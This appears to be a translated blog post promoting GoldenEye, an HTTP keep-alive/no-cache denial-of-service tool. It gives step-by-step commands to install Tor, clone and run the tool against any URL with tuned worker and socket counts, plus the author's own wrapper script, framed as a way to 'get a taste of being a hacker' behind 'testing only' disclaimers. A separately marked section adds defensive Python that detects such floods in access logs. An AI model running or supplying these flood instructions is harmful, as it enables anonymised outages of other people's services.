
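Every day I receive SMS alerts from Alibaba Cloud saying my server is under attack. That gave me an idea: run a stress test against my own server myself. After searching around GitHub, I found a project called GoldenEye. I'm sharing it here so you can get a taste of being a hacker. That said, someone who only knows DoS attacks is a fake hacker, crude and heavy-handed; to become a real hacker you still need to study in depth.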

GoldenEye is a Python app for SECURITY TESTING PURPOSES ONLY!

GoldenEye is an HTTP DoS Test Tool.

Attack Vector exploited: HTTP Keep Alive + NoCache

This project is for DoS testing only; do not use it for anything else!

Test environment: CentOS 7.2
The steps are as follows:

yum install git wget -y
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-9.noarch.rpm
rpm -ivh epel-release-7-9.noarch.rpm
yum install tor -y
git clone https://github.com/jseidl/GoldenEye.git
cd GoldenEye
chmod +x goldeneye.py 
service tor start
./goldeneye.py <url> [OPTIONS]

Usage is simple as well:

USAGE: ./goldeneye.py <url> [OPTIONS]
OPTIONS:

Flag              Description (default)
-u, --useragents  File with user-agents to use (default: randomly generated)
-w, --workers     Number of concurrent workers (default: 50)
-s, --sockets     Number of concurrent sockets (default: 30)
-m, --method      HTTP method to use: 'get', 'post' or 'random' (default: get)
-d, --debug       Enable debug mode [more verbose output] (default: False)
-h, --help        Shows this help

The "Strikes Deffered" value shows how many strikes were blocked or crashed. The number in brackets shows how many connections timed out or were answered with an error 500.

Example: ./goldeneye.py https://127.0.0.1 -w 200 -s 100

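Once the test has started, watch the Strikes Deffered message: it represents the number of attacks that were blocked or crashed. The number in parentheses is the number of connection timeouts or error 500 responses.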
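On the server side, the same test run is a chance to check whether your access log would reveal the "HTTP Keep Alive + NoCache" pattern. The following is an added example, not code from the original post or from the GoldenEye project. It assumes the nginx/Apache "combined" log format and that NoCache requests show up as near-unique URLs sent under many User-Agent strings; the function names, thresholds and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Access-log "combined" format, as written by nginx and Apache by default.
LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+) [^"]*" '
                     r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # skip malformed lines instead of failing
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["url"], m["ua"]

def suspicious_clients(lines, window=timedelta(seconds=10), min_requests=20,
                       min_unique_urls=0.8, min_user_agents=5):
    """Flag IPs that, inside one sliding window, send >= min_requests requests
    whose URLs are nearly all distinct (cache busting) under many User-Agents."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        by_ip[rec[0]].append(rec[1:])
    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r[0])
        start = 0
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window:
                start += 1  # shrink the window from the left
            burst = recs[start:end + 1]
            urls = {u for _, u, _ in burst}
            agents = {a for _, _, a in burst}
            if (len(burst) >= min_requests and len(urls) / len(burst) >= min_unique_urls
                    and len(agents) >= min_user_agents):
                flagged[ip] = {"requests": len(burst), "urls": len(urls), "agents": len(agents)}
                break
    return flagged

def sample_log():
    """Constructed log lines (documentation IP ranges), not real traffic."""
    t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    fmt = '{} - - [{}] "GET {} HTTP/1.1" 200 512 "-" "{}"'
    lines = ["garbage line that does not parse"]
    for i in range(30):
        ts = (t0 + timedelta(milliseconds=100 * i)).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(fmt.format("203.0.113.7", ts, f"/?r{i}={i * 7919}", f"TestAgent/{i % 12}"))  # flood-like
        lines.append(fmt.format("198.51.100.20", ts, f"/page/{i % 3}", "Mozilla/5.0"))  # busy but cacheable
    return lines

if __name__ == "__main__":
    print(suspicious_clients(sample_log()))
```

The busy client that keeps requesting the same three pages under one User-Agent is not flagged; only the client whose URLs are nearly all distinct is. Tune the thresholds against your own baseline traffic before using the result to drive rate limiting.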

I wrote a clumsy script for CentOS 7; see: https://github.com/zyl6698/Goldendos
Usage:

git clone https://github.com/zyl6698/Goldendos && cd Goldendos
chmod +x hack1.0.sh
./hack1.0.sh

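Enjoy!
It also ran successfully on a Raspberry Pi; those of you who have the hardware can give it a try.
Once again: this project may only be used for learning and testing, and not for anything else!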